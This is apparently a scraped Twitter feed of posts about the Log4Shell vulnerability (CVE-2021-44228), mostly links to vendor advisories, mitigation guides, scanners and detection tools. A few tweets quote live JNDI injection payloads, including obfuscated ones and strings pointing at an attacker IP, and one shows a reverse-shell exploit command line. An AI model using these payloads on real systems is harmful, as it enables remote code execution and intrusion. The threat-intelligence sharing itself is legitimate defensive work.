2021-12-17 07:32:47Log4J Vulnerability vmware vCenter Workaround (CVE-2021-44228) https://t.co/khwu4yze2z via @YouTube #log4J… https://t.co/FcV0cMOdvh https://youtu.be/PfBQT-ua9xY https://twitter.com/i/web/status/1471743562459062272IOTechNow
2021-12-17 07:23:55Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://t.co/K8cHgKJN8i #infosec #pentest #bugbounty RT @_r_netsec https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.htmlbeingsheerazali
2021-12-17 07:23:10Log4j Sec Vulnerabilities CVE-2021-44228 – Mitigation Strategies for TAS Ops https://t.co/wQYz3wBlkk https://dy.si/DVx5uC2LagnDary
2021-12-17 07:21:56NONE of @glavsoft products are impacted by CVE-2021-44228 Apache Log4j Vulnerability. 🧐After a detailed review of o… https://t.co/Aojnx5NndZ https://twitter.com/i/web/status/1471740710990745600tightvnc
2021-12-17 07:20:33log4j2 CVE-2021-44228 – Log4Shell https://t.co/rFWvyhM8Qz https://seshupasam.wordpress.com/2021/12/17/log4j2-cve-2021-44228-log4shell/seshupasam
2021-12-17 07:15:37CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-17 07:15:215 Things We’ve Learned About CVE-2021-44228 https://t.co/UwL8yzj9jh https://www.itsecuritynews.info/5-things-weve-learned-about-cve-2021-44228/IT_securitynews
2021-12-17 07:13:26Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/AHTxhfHcmb https://dy.si/FGL5BZ2JohnSoeHtoonOo
2021-12-17 07:03:135 Things We’ve Learned About CVE-2021-44228 https://t.co/MsgFE1qM4w https://t.co/vywXgUmvj4 https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/?utm_source=dlvr.it&utm_medium=twitterRigneySec
2021-12-17 07:02:13A honeypot for the Log4Shell vulnerability (CVE-2021-44228) ✅ #coding #dev #developer #programmer #programming… https://t.co/h21vi1wtup https://twitter.com/i/web/status/1471735247372959750Python_News
2021-12-17 06:51:44無題 - 改 - CVE-2021-44228 Log4j問題 まとめ https://t.co/7mzsf6bV26 (日記の自動ポストです) http://dlvr.it/SFXbj4tomonobu0713
2021-12-17 06:51:34🚨This week's SAP Developer News episode is out - get it while it's hot! - Detail &amp; support for CVE-2021-44228 - C… https://t.co/saMzHasV9r https://twitter.com/i/web/status/1471733185637666820qmacro
2021-12-17 06:50:55Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/GtPqTxTATm [PDF]Apache Log4jに関… https://t.co/oczyPyl9we https://www.intellilink.co.jp/column/vulner/2021/121500.aspx https://twitter.com/i/web/status/1471733995474137088catnap707
2021-12-17 06:50:23Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/mgpIDWVXrx https://www.intellilink.co.jp/column/vulner/2021/121500.aspxasahiVER1
2021-12-17 06:44:30Amazon Linux AMI 2 の aws-kinesis-agent に任意のコードを実行されるなど複数の問題 (CVE-2021-44228 [40831] https://t.co/YBd5wMll3n #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40831softek_jp
2021-12-17 06:41:33Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation #UI #security via… https://t.co/EEC2xlw36e https://twitter.com/i/web/status/1471731024635867140amin_sorkheh72
2021-12-17 06:40:23If you are testing for #log4jRCE CVE-2021-44228. Then try using multiple collaborators or your own collaborator ser… https://t.co/sfw7BAm0iX https://twitter.com/i/web/status/1471731699297910784Kn0xPr0
2021-12-17 06:32:44統合版 JPCERT/CC | お知らせ:JPCERT/CC Eyes「Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測」 https://t.co/rQ9xM99YE0 #itsec_jp https://ift.tt/3e22tqiitsec_jp
2021-12-17 06:32:03JPCERT/CC Eyes「Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測」を公開。JPCERT/CCでの観測状況とあわせて、攻撃の詳細について紹介しています。^MM https://t.co/MPCzxJlFyp https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmljpcert
2021-12-17 06:31:31再送です。 【2021/12/16 情報更新】【重要】「Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)」が及ぼすPARTsolutionsへの影響について、前回の内容を更新いたしました。https://t.co/DFl3pcpTM2 https://www.cadenas.de/news-reader/items/jp-20211216-Apache-Log4jCADENAS_WEB2CAD
2021-12-17 06:30:30Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/eyLFMvrZ8R https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlmochidai
2021-12-17 06:21:16CVE-2021-44228 – Leitfaden für Sicherheitsupdates – Microsoft - Apache Log4j Remote Code Execution Vulnerability https://t.co/PEllu3aER9 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228valdet_b
2021-12-17 06:21:05Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 – Microsoft Security Response Center https://t.co/yvR4140D2B https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/valdet_b
2021-12-17 06:20:58Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/G9l0NTODnI https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/valdet_b
2021-12-17 06:20:41#Security Bulletin: #IBM #CognosAnalytics: Apache log4j Vulnerability (CVE-2021-44228) https://t.co/z71sisnTBI https://www.ibm.com/support/pages/node/6526474engAhmedMostafa
2021-12-17 06:11:45Apache Log4j の脆弱性(CVE-2021-44228)に関するご案内 https://t.co/aBclVLuagR #Ranorex #TechMatrix https://t.co/5TiAoh07Wy http://dlvr.it/SFXW1nTechMatrix_Se
2021-12-17 06:11:41CVE-2021-44228 Log4j問題 まとめ https://t.co/YsrvQrL4ap http://tomo3110.sakura.ne.jp/cgi-bin/diary/diary.cgi?file=diary&page=2021/12/17tomonobu0713
2021-12-17 06:10:57CISA Log4j (CVE-2021-44228) Vulnerability Guidance - This repository provides CISA's guidance and an overview of re… https://t.co/xHcHkag8D1 https://twitter.com/i/web/status/1471723314523557891AndrewNebus
2021-12-17 06:10:46IT Risk: Citrix.Multiple vulnerabilities including CVE-2021-44228 in Endpoint Management (Citrix XenMobile Server),… https://t.co/Jq9FRNDeoi https://twitter.com/i/web/status/1471723549304160256management_sun
2021-12-17 06:10:19@brunoborges @Cremich @MarkSailes3 @lucamezzalira that helps to mitigate the issues in CVE-2021-44228 and CVE-2021-… https://t.co/07jrxAtgIp https://twitter.com/i/web/status/1471724047209750532sebsto
2021-12-17 06:00:45Apache Log4j 脆弱性(CVE-2021-44228)への対応について "VAddy検査サーバー/プロキシサーバー/Webサーバーおよび弊社が提供するツール等において本脆弱性の影響を受けないことを確認しております。" https://t.co/aIG7mYTG5o https://vaddy.net/ja/release/202112_log4j.htmlvaddynet
2021-12-17 05:50:51Log4j2 Topic FOFA sorted out the components affected by CVE-2021-44228 and will continue to update the list.… https://t.co/KHGad5GuiG https://twitter.com/i/web/status/1471715600028168192fofabot
2021-12-17 05:50:48攻撃者が話題のlog4jの脆弱性(CVE-2021-44228)ではない2番目の別の脆弱性(CVE-2021-45046)を悪用しようとしているとCloudflareが警告 44228修正版の2.15.0では45046は修正されて… https://t.co/GYlaISdSbd https://twitter.com/i/web/status/1471715671730180099sen_u
2021-12-17 05:50:43CVE-2021-44228_scanner Applications that are vulnerable to the #log4j CVE-2021-44228 issue may be detectable by sca… https://t.co/GRk10nwqCS https://twitter.com/i/web/status/1471715936218632192hack_git
2021-12-17 05:50:32As predicted, more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228)… https://t.co/Eef3oOS6Jr https://twitter.com/i/web/status/1471716849117286404manuelbissey
2021-12-17 05:50:31Amazon Linux 2でCriticalのALASが公開されたけど、CVE-2021-44228を見てすぐにLog4j関連だと分かった。aws-kinesis-agentが使っていたのか。restartmylife35
2021-12-17 05:50:22The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/tpih2aTuFL https://t.co/x1oU9b4Yql https://bit.ly/3F6AMs2BilekSimon
2021-12-17 05:50:17Updated guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation: - New MS Sentinel… https://t.co/gHjSmQ0liE https://twitter.com/i/web/status/1471717951720071171samilamppu
2021-12-17 05:50:11Détection de l’exploitation de la vulnérabilité CVE-2021-44228 (log4j2) avec Elastic Security https://t.co/2c9rmaHZHf https://www.elastic.co/fr/blog/detecting-log4j2-with-elastic-securityElasticFR
2021-12-17 05:30:41» Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog https://t.co/rcNmuSor7r https://piyolog.hatenadiary.jp/entry/2021/12/13/045541twinuma
2021-12-17 05:17:08Security Bulletin: IBM Cognos Analytics: Apache log4j Vulnerability (CVE-2021-44228) https://t.co/gYkzpJUMuG https://ift.tt/3yB68Vbmicsieg
2021-12-17 05:01:16CVE-2021-44228mattgillard
2021-12-17 05:00:52Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://t.co/GYv1SHOBSM https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html_r_netsec
2021-12-17 05:00:28Risk analysis of Log4Shell (CVE-2021-44228) and mitigation via /r/netsec https://t.co/nyNzrcZGce #cybersecurity #netsec #news https://ift.tt/30ApHAHCybrXx0
2021-12-17 04:57:12Security Bulletin: IBM Cognos Analytics: Apache log4j Vulnerability (CVE-2021-44228) https://t.co/gYkzpJUMuG https://ift.tt/3yB68Vbmicsieg
2021-12-17 04:51:17CVE-2021-44228、Log4j の脆弱性検出用のハンティングクエリと分析ルールのセットが出ました。Microsoft Sentinel -&gt; コンテンツハブ -&gt; "Log4j"で検索 で見つけられます  What’s… https://t.co/Qp48b4kGJt https://twitter.com/i/web/status/1471702320933388288tomonari_q
2021-12-17 04:51:07.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/b5Wt737H1s https://twitter.com/i/web/status/1471702817320718336Woronka
2021-12-17 04:50:36New post: "Risk analysis of Log4Shell (CVE-2021-44228) and mitigation" https://t.co/kFDkNSHJq5 https://ift.tt/3IUp2v3Myinfosecfeed
2021-12-17 04:40:57The Everyperson’s Guide to Log4Shell (CVE-2021-44228) https://t.co/p7l9MgOCJ2 https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/m6_gr3Y
2021-12-17 04:21:00CVE-2021-44228を非情報技術者の方へ説明する事のメリットを知りたいkcirevam2
2021-12-17 04:20:43Example CVE-2021-44228 payload: User agent: ekausif/3.1 ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${… https://t.co/ZjjGYAsOiE https://twitter.com/i/web/status/1471695139307339776bad_packets
2021-12-17 04:10:31Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://t.co/joQmdbu5Ym #Log4Shell #mitigation https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.htmlhardenedvault
2021-12-17 04:00:56警察庁: Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について https://t.co/MZMkGhtSM5 https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmloshimyja
2021-12-17 04:00:43The latest update for #Cyphere includes "CVE-2021-44228 – #Log4j zero day vulnerability, detection and #Log4shell f… https://t.co/EVJkba4FsC https://twitter.com/i/web/status/1471689678826975234opsmatters_uk
2021-12-17 04:00:06"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeVMy9 Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-17 03:50:31#Log4j2-CVE-2021-44228-revshell For reverse shell: $~ python3 Log4j2-revshell. py -M rev -u http://www.victimLog4j… https://t.co/F6sIm9gXzF https://twitter.com/i/web/status/1471687314501943298FragmentedSoul5
2021-12-17 03:50:25An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/36NpdOgxnl https://twitter.com/i/web/status/1471688483190321152ProductCERT
2021-12-17 03:25:12Example CVE-2021-44228 payload: ${jndi:ldap://78.31.71.248:1389/8el8iu} ${jndi:ldap://78.31.71.248:1389/gfwwq7} P… https://t.co/z2IRyEiPYn https://twitter.com/i/web/status/1471680587626737670bad_packets
2021-12-17 03:11:1650件のコメント https://t.co/jnymIgISNn “Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog” https://t.co/poZEXreaEi https://b.hatena.ne.jp/entry/s/piyolog.hatenadiary.jp/entry/2021/12/13/045541#utm_campaign=bookmark_share&utm_content=piyolog.hatenadiary.jp&utm_medium=social&utm_source=twitter&utm_term=%E3%83%86%E3%82%AF%E3%83%8E%E3%83%AD%E3%82%B8%E3%83%BC%20java https://htn.to/3UzByZcHWjbenelux01
2021-12-17 03:00:37Heck of a week for a logging lib because we've just had the whole log4j CVE-2021-44228 thing, and Scala in particu… https://t.co/tM5wXAvBjl https://twitter.com/i/web/status/1471675985703669768lunasorcery
2021-12-17 02:54:55The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/naCBHIRalR https://twitter.com/i/web/status/1471671551850434561RTocaxelli
2021-12-17 02:54:38Log4Shellの脆弱性 – CVE-2021-44228 https://t.co/SS3V8VmWwj https://blogs.mcafee.jp/llog4shell-vulnerability-is-the-coal-in-our-stocking-for-2021ohhara_shiojiri
2021-12-17 02:54:25The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/QDmfEeCfjo https://t.co/6Xi7xEY0nw https://bit.ly/3p0qNz1HectorDi4z
2021-12-17 02:54:13The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/QMCFeSgWTf https://twitter.com/i/web/status/1471672033255776260RTocaxelli
2021-12-17 02:51:29Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2 https://t.co/gngn4JLJ7d https://t.co/p4h94UV5A1 http://dlvr.it/SFXB78cloudplaninc
2021-12-17 02:41:35Eclipse の Apache Log4j に任意のコードを実行される問題 (CVE-2021-44228) [40826] https://t.co/XOlNaoF2d6 #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40826softek_jp
2021-12-17 02:21:43Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/jfO4HolDsI https://www.intellilink.co.jp/column/vulner/2021/121500.aspxohhara_shiojiri
2021-12-17 02:14:05CVE-2021-45046 のフォローアップも入れて日本語翻訳記事を更新しました。 セキュリティ警告:Apache Solr affected by Apache Log4J CVE-2021-44228 https://t.co/RNrFsEhalV https://www.rondhuit.com/cve-2021-44228-apache-solr-affected-apache-log4j.htmlkojisays
2021-12-17 02:10:53Who coordinated the global response for CVE-2021-44228 aka #log4j #log4shell? Hint: it's in the question. The timel… https://t.co/2zkdlpEMCg https://twitter.com/i/web/status/1471663056081981442kurtseifried
2021-12-17 02:10:18The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/bkqo90YXmx https://twitter.com/i/web/status/1471663549940445185velez1066
2021-12-17 02:10:10The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/iE7gN74DQG https://twitter.com/i/web/status/1471663649974534147velez1066
2021-12-17 02:02:24https://t.co/KleFCHEUUG Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2 #cybersecurity https://cloudsecurityalliance.org/articles/keeping-up-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/netsecu
2021-12-17 02:01:15CVE-2021-44228Apache Log4j 2.0-beta9から2.14.1 (2.15.0-rc1も含まれる) =&gt; 影響を受ける最初のバージョン(2.0-beta9)のリリース日は2013年9月14日 今現在ja… https://t.co/Y9dL2kJDLa https://twitter.com/i/web/status/1471660012208791553achinoyamabiko
2021-12-17 02:01:07Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2 #infosec #infosecurity #cybersecurity… https://t.co/j0BjclC5pT https://twitter.com/i/web/status/1471660029623390209CyberIQs_
2021-12-17 02:00:19CVE-2021-44228ムカつく〜 色んな所に出てきてまるでゴキブリのよう Pythonのloggingとか派生形も攻撃できるのかな?b8bait
2021-12-17 01:51:13Arduino's response to Log4j2 vulnerability CVE-2021-44228 https://t.co/0QVlcrFbze Toca actualizar el IDE de Arduino. https://support.arduino.cc/hc/en-us/articles/4412377144338-Arduino-s-response-to-Log4j2-vulnerability-CVE-2021-44228vrruiz
2021-12-17 01:50:50java: Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート https://t.co/P739auVxyz https://www.intellilink.co.jp/column/vulner/2021/121500.aspxRSS_hateb_l_Roy
2021-12-17 01:23:19回避策に『remove_log4j_class.py script』が追加されていますね:Workaround instructions to address CVE-2021-44228 in vCenter Server an… https://t.co/2ay2WoTmhd https://twitter.com/i/web/status/1471649236622409735tamosan
2021-12-17 01:23:10「SIDfm の監視対象製品への影響」に製品情報を追加しました。 Apache Log4j CVE-2021-44228 (Log4Shell) の影響有無リスト | SIDfm ブログ https://t.co/fAwr9W3IwQ https://www.softek.co.jp/SID/blog/archive/entry/20211215.htmlsoftek_jp
2021-12-17 01:23:07自社ソフトウェア製品に対してCVE-2021-44228(log4j)問題の確認が進み、担当モダリティに影響はなさそうで一安心ですmoonphase16
2021-12-17 01:01:56Operational Technology (OT) networks are at risk from the recently-announced Apache Log4j (CVE-2021-44228) vulnerab… https://t.co/jVuRNH9oDS https://twitter.com/i/web/status/1471645522817650693aginter
2021-12-17 01:01:34Operational Technology (OT) networks are at risk from the recently-announced Apache Log4j (CVE-2021-44228) vulnerab… https://t.co/BUMY1KgFQi https://twitter.com/i/web/status/1471645523178307595WaterfallSecure
2021-12-17 01:01:10Operational Technology (OT) networks are at risk from the recently-announced Apache Log4j (CVE-2021-44228) vulnerab… https://t.co/ToiMPG5pHP https://twitter.com/i/web/status/1471645523203571715FrenkelLior
2021-12-17 00:52:07@malwrhunterteam @bad_packets @GreyNoiseIO @TrendMicroRSRCH 158.247.199[.]191 attempting to exploit CVE-2021-44228… https://t.co/1XOinN2CQ4 https://twitter.com/i/web/status/1471642912752558082KorbenD_Intel
2021-12-17 00:51:25このLog4j2の検証レポート分かりやすいし、お客様向けの説明資料も公開されてるのでとても参考になる。 &gt;&gt; Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデー… https://t.co/I9uzPGh5GO https://twitter.com/i/web/status/1471642976120377347mu2in
2021-12-17 00:50:39Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) - https://t.co/USlGzo3noH 'Sicherheitsforscher haben… https://t.co/0qofkynPzl https://tarnkappe.info/log4shell-patch-per-exploit-cve-2021-44228-cve-2021-45046 https://twitter.com/i/web/status/1471643619652251656vform
2021-12-17 00:46:43Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2: Quick note: from now on I will refer to log4j… https://t.co/l4Uxz1EwOv https://twitter.com/i/web/status/1471639044119404548DTS_Solution
2021-12-17 00:43:42Keeping up with log4shell aka CVE-2021-44228 aka the log4j version 2 https://t.co/iKWvoAWVdY https://t.co/ztX44bxWtu https://cloudsecurityalliance.org/articles/keeping-up-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/?utm_source=dlvr.it&utm_medium=twitterRigneySec
2021-12-17 00:33:54In response to the CVE-2021-44228 or Log4Shell vulnerability, the team behind #ElasticSecurity has developed additi… https://t.co/E0OACwgzc8 https://twitter.com/i/web/status/1471637013967380486elastic
2021-12-17 00:23:25【2021/12/16 情報更新】【重要】「Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)」が及ぼすPARTsolutionsへの影響について、前回の内容を更新いたしました。https://t.co/DFl3pcpTM2 https://www.cadenas.de/news-reader/items/jp-20211216-Apache-Log4jCADENAS_WEB2CAD
2021-12-17 00:22:02Hey @bdw429s I wondered if you'd seen this CVE-2021-44228_scanner from CERT/CC. https://t.co/w7F7ywl9Ek It requir… https://t.co/dJvSVIqrZh https://github.com/CERTCC/CVE-2021-44228_scanner https://twitter.com/i/web/status/1471634658299285505gamesover
2021-12-17 00:20:36Claris FileMaker ServerにはLog4j2に起因する脆弱性(CVE-2021-44228およびCVE-2021-45046)の影響はないことが確認されましたが、FMプランでは念のため別の危険性を低減するための緩… https://t.co/S1b2sUgYVt https://twitter.com/i/web/status/1471636079300460546matsuo_atsushi
2021-12-17 00:12:20CVE-2021-44228 AND YOUR ORACLE E-BUSINESS SUITE/FUSION MIDDLEWARE SYSTEMS https://t.co/8xPT1GvJcB https://buff.ly/3yzbZdJbiju_thomas
2021-12-17 00:12:04【#セキュリティ】Log4jの脆弱性(CVE-2021-44228)について、ソフトウェア別対応状況まとめ。自分用メモφ(..) → / “log4shell/software at main · NCSC-NL/log4shel… https://t.co/n6Y96hig4i https://twitter.com/i/web/status/1471631494569689088k_kukita
2021-12-17 00:10:48BlueTeam CheatSheet * Log4Shell* - Log4Shell (CVE-2021-44228) is a vulnerability in Log4j https://t.co/H4qZoSgTED https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592alwell
2021-12-17 00:05:06Update for Apache Log4j2 Issue (CVE-2021-44228) https://t.co/jTHyeoRt89 https://aws.amazon.com/security/security-bulletins/AWS-2021-006/security_inside
2021-12-17 00:03:38Exploiting and Mitigating CVE-2021-44228 #log4j #log4jshell #Exploit #poc https://t.co/k4bdY6M2vl https://youtu.be/5DbhKLnZswYMiguelHzBz
2021-12-17 00:01:58「Salesforce」を検索 #sfdg - Tech Solvency: The Story So Far: CVE-2021-44228 (Log4Shell log4j vulnerability). https://t.co/N8swsFZ17p https://ift.tt/3s6dgb0SfdgTokyo
2021-12-17 00:01:33Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート https://t.co/OsEIH2eKBP https://www.intellilink.co.jp/column/vulner/2021/121500.aspxit_hatebu
2021-12-17 00:00:47@sonatype Log4shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire? https://t.co/IqOYti0ulH https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fireAspenwoodVc
2021-12-16 23:53:04【TECHSシリーズをご利用いただいているお客様へ】 「Apache Log4j」 の脆弱性(CVE-2021-44228)問題につきまして、TECHSシリーズは、本脆弱性の影響を受けないことを確認しましたのでお知らせいたします。 https://t.co/130h56fimA https://www.techs-s.com/news/show/626TECHNOA_TOKYO
2021-12-16 23:52:37NSX-T の Distribured IDS/IPS でも CVE-2021-44228 向けのシグネチャがリリースされ始めたみたい。 Detecting &amp; Preventing CVE-2021-44228 (Log4Sh… https://t.co/kyD35jm5Dn https://twitter.com/i/web/status/1471626946853601280Jangari_nTK
2021-12-16 23:44:51👍 on @YouTube: Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/PKxwFCAh8v https://www.youtube.com/watch?v=0-abhd-CLwQZerquix18
2021-12-16 23:44:39Okta RADIUS Server Agent vulnerable to #log4j CVE-2021-44228 https://t.co/UntyQojROb https://trust.okta.com/security-advisories/okta-radius-server-agent-cve-2021-44228Recon_InfoSec
2021-12-16 23:42:34Este artículo de KB cubre cómo los clientes pueden Detectar y Prevenirse de CVE-2021-44228 (#Log4Shell) con #NSX Di… https://t.co/yckNvqpbHy https://twitter.com/i/web/status/1471624668847263749Esteban_Prieto
2021-12-16 23:41:45.@FortiGuardLabs Threat Signal Report: Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) →… https://t.co/XtedPwZ7Ps https://twitter.com/i/web/status/1471625155940163588cornemare
2021-12-16 23:41:26#log4shell に関して、CERT/CC から JAR ファイルをスキャンする検査ツールがリリースされました。 CVE-2021-44228_scanner https://t.co/4pwJSVepyv PowerSh… https://t.co/dmk5T61RD9 https://github.com/CERTCC/CVE-2021-44228_scanner https://twitter.com/i/web/status/1471625215784660992scqrinc
2021-12-16 23:40:51CVE-2021-44228について職場で全く話題になっていない悲しみ。 職場slackチャンネルのオープン、クローズどちらにもない。弊社ここぞと言う尖ったところ無いもんな。roaring_dog
2021-12-16 23:31:04「CVE-2021-44228_scanner」 #log4shell に関して、CERT/CC から .jar をスキャンするツールがリリースされました。 https://t.co/4pwJSVepyv PowerShell… https://t.co/0Hp5wwzw8z https://github.com/CERTCC/CVE-2021-44228_scanner https://twitter.com/i/web/status/1471623048252264448scqrinc
2021-12-16 23:30:48Any ⁦@Oracle⁩ customers who are worried about Log4Shell (CVE-2021-44228) should check out JJ Millens latest blog. G… https://t.co/2fpB1ztCZa https://twitter.com/i/web/status/1471623061841534979ChrisMasonNamos
2021-12-16 23:22:57log4j CVE-2021-44228-Scanner 1.7.0 released https://t.co/7LXw8waVW3 #log4shell #log4j @logpresso https://github.com/logpresso/CVE-2021-44228-Scanner/releases/tag/v1.7.08con
2021-12-16 23:21:37CVE-2021-44228 への VCSA 向け対処の KB が更新されており、全ての JndiLookup.class の削除の手順が追加されています。 更新前の手順を実施済みの場合でも、"Run the remove_lo… https://t.co/mXTlKTOQGY https://twitter.com/i/web/status/1471620287590694912Jangari_nTK
2021-12-16 23:21:19Apache Log4j 2 Vulnerability (CVE-2021-44228) &amp; (CVE-2021-45046) #inFoSEC #CyberSecurity #inFormationSecurity… https://t.co/1ZfSbJN33I https://twitter.com/i/web/status/14716206870225059883XS0
2021-12-16 23:20:10🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/esr6mxnKg1 https://twitter.com/i/web/status/1471621047858438145threatintelctr
2021-12-16 23:13:24#Exploiting and Mitigating #CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/ngTG01xLyN https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/WilfridBlanc
2021-12-16 23:13:17Log4j-finder: Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228… https://t.co/hkpiEA5grg https://twitter.com/i/web/status/1471616187041816584JekiCode
2021-12-16 23:12:35Log4j 2.15.0には、特定の状況下での機微情報流出につながる脆弱性があるとセキュリティ企業Praetorian社。Log4Shell (CVE-2021-44228)及びCVE-2021-45046とは別の3件目。脆弱性の… https://t.co/zsZkL7H19f https://twitter.com/i/web/status/1471616672436199425__kokumoto
2021-12-16 23:11:39少し前に知り合いのセキュリティ屋さんから話を聞いてたんだけど、TLではあまり見かけないなぁ Log4jの脆弱性問題(CVE-2021-44228)への対応について(2021/12/15)| https://t.co/a1aW0oD5Mz https://help.live2d.com/cubismeditor/log4j-cve-2021-44228/nagi_1o_o1
2021-12-16 23:00:18[- Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) -] https://t.co/WYlZMXIck8 #ITsec #sicherheit https://ift.tt/3maWx2Jitsecdump
2021-12-16 22:51:20Hot topic right now so invest a little time to catch our DC Connects show from this week, Log4j CVE-2021-44228 Vuln… https://t.co/7T1O5cn3II https://twitter.com/i/web/status/1471611109861908488devcentral
2021-12-16 22:51:11The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/qDlUr8dvwc https://twitter.com/i/web/status/1471611385503260677RTocaxelli
2021-12-16 22:50:41Utilizzare #MDfE (Microsoft Defender for Endpoint) per rilevare #Log4J / #CVE-2021-44228. Jeffrey Appel thanks a l… https://t.co/G5CP1GPpw3 https://twitter.com/i/web/status/1471611962421395459ilsensa7
2021-12-16 22:50:31「ヨンヨンニーニッパ」と、CVEナンバーのCVE-2021-44228をだんだんソラで言えるようになってきた #log4shellseen8th
2021-12-16 22:50:10Geocortex and CVE-2021-44228 https://t.co/zg1aEdozYqGlen_Dhu
2021-12-16 22:40:33@adownie @WarlickLeslie @PaulLeeTeeks Better patch it asap to close the Log4J vulnerability per CVE-2021-44228 as t… https://t.co/MI9C44dEPH https://twitter.com/i/web/status/1471609249906180107GeoffWelling
2021-12-16 22:40:24Microsoft Sentinel provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing and learning more about… https://t.co/Wuxe3UTako https://twitter.com/i/web/status/1471609971804545028tanmayg
2021-12-16 22:40:08Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228) https://t.co/qGAs3VezXU https://lnkd.in/d5p9yVJdSim0nFerro
2021-12-16 22:32:43Recent additions to #Log4Shell analysis: - Apache JSPWiki, OFBiz, Druid vulnerable to CVE-2021-44228. PoCs and IOC… https://t.co/OVkBKQujio https://twitter.com/i/web/status/1471601064398962688AttackerKb
2021-12-16 22:31:22Latest CVE-2021-44228 #log4j mass scan stats from our global honeynet + analysis of top 10 dropped callback URIs &amp;… https://t.co/aaVv0kQTVs https://twitter.com/i/web/status/1471606437692518401Shadowserver
2021-12-16 22:27:40📬 Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison… https://t.co/E76wL21rD3 https://twitter.com/i/web/status/1471605561833754625tarnkappe_info
2021-12-16 22:25:40📬 Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison… https://t.co/qkrmEW2Nzg https://twitter.com/i/web/status/1471605562945196032lsobiraj
